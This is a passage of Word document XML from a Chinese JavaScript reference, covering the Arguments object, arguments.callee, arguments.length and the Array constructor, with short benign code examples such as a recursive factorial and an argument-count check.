        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给函数的参数个数，以及</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象中数组元素的个数。</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调用函数时，会为其创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并自动初始化局部变量</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>，指代该</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象的主要用途是，用来判断有多少个参数传入函数，还可用来指代未命名的参数。然而，除了数组元素和</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，还可通过</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指代匿名函数自身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大部分情况下，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象想象成一个数组，并额外带有</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>属性。但是，</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象并不是</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>的实例，</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>属性也不具有</w:t>
      </w:r>
      <w:r>
        <w:t>Array.length</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:t>性的任何特殊行为，而且不能用来改变数组的大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在非严格模式下，</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象具有一个很不寻常的特性。当函数带有命名的参数时，</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象的数组元素与局部变量是等同的。</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象和参数名为引用同一个值提供了两种途径。用参数名改变一个函数参数的值，会同时影响通过</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象获取的值，反之，通过</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象改变一个函数参数的值，也会影响通过参数名获取的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function;</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="575" w:name="Arguments_callee"/>
      <w:r>
        <w:t>Arguments.callee</w:t>
      </w:r>
      <w:bookmarkEnd w:id="575"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在严格模式下未定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前正在执行的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arguments.callee</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arguments.callee</w:t>
      </w:r>
      <w:r>
        <w:t>指代当前正在执行的函数。通过它可以引用匿名函数自身。该属性只定义在函数体中。</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在匿名函数内使用</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>属性来引用匿名函数自身，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以便实现递归</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var factorial=function(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>2)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return x*arguments.callee(x-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=factorial(5);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="576" w:name="Arguments_length"/>
      <w:r>
        <w:t>Arguments.length</w:t>
      </w:r>
      <w:bookmarkEnd w:id="576"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传给函数的参数个</w:t>
      </w:r>
      <w:r>
        <w:t>数</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arguments.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示传给当前函数的参数个数。该属性只定义在函数体中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意该属性表示的是实际传入的参数个数，而不是声明的参数个数。声明的参数个数请参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Function.length</w:t>
      </w:r>
      <w:r>
        <w:t>。同时要留意该属性没有任何</w:t>
      </w:r>
      <w:r>
        <w:t>Array.length</w:t>
      </w:r>
      <w:r>
        <w:t>属性的特殊行为。</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使用</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象来检查传入参数个数的正确性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function check(args){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var actual=args.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>实际的参数个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>expected=args.callee.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>期待的参数个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(actual!=expected){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不相等，则抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("</w:t>
      </w:r>
      <w:r>
        <w:t>参数个数有误：期望值：</w:t>
      </w:r>
      <w:r>
        <w:t>"+expected+";</w:t>
      </w:r>
      <w:r>
        <w:t>实际值：</w:t>
      </w:r>
      <w:r>
        <w:t>"+actual);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>演示如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>check()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的示例函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(x,y,z){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>check(arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>检查参数个数的正确性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x+y+z;//</w:t>
      </w:r>
      <w:r>
        <w:t>正常执行该函数的剩余代码</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Array.length</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Function.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="577" w:name="Array"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="577"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对数组的内置支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object→Array</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Array()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Array(size)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Array(element0,element1,...,elementn)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设定的数组元素个数。返回数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性等于</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>element0,...elementn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数列表，可以是两个或多个任意值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。当</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数用这些参数调用时，新创建的数组实例会用指定的参数值来初始化，</w:t>
      </w:r>
      <w:r>
        <w:t>并将</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为参数个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>新创建和初始化的数组。当不带参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>时，返回的数组为空，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。当用单个数值参数调用时，构造函数返回的数组带有指定个数的未定义元素。使用其他参数调用时，构造函数会使用指定的参数值初始化数组。当</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，直接当做函数调用时，其表现行为与带有</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时是完全一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当给</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数传入单个整数参数</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>时，如果</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>为负数，或大于</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>时，会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>直接量语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>规定了数组的直接量语法。可以将逗号分隔的表达式列表放在方括号中来创建和初始化一个数组。这些表达式的值会成为数组的元素。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,true,'abc'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=[a[0],a[0]*2,f(x)];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的整数，用来指明数组中的元素个数。当数组中的元素不连续时，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>等于数组中最后一个元素的序号加一。改变</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>值会裁减或扩充数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中新</w:t>
      </w:r>
      <w:r>
        <w:t>增加了以下方法：</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>，其他浏览器已经实现了这些方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>把元素衔接到数组中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试断言函数是否对每个数组元素都为真。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回满足断言函数的数组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>forEach()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为数组的每一个元素调用指定函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在数组中查找匹配元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>join()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
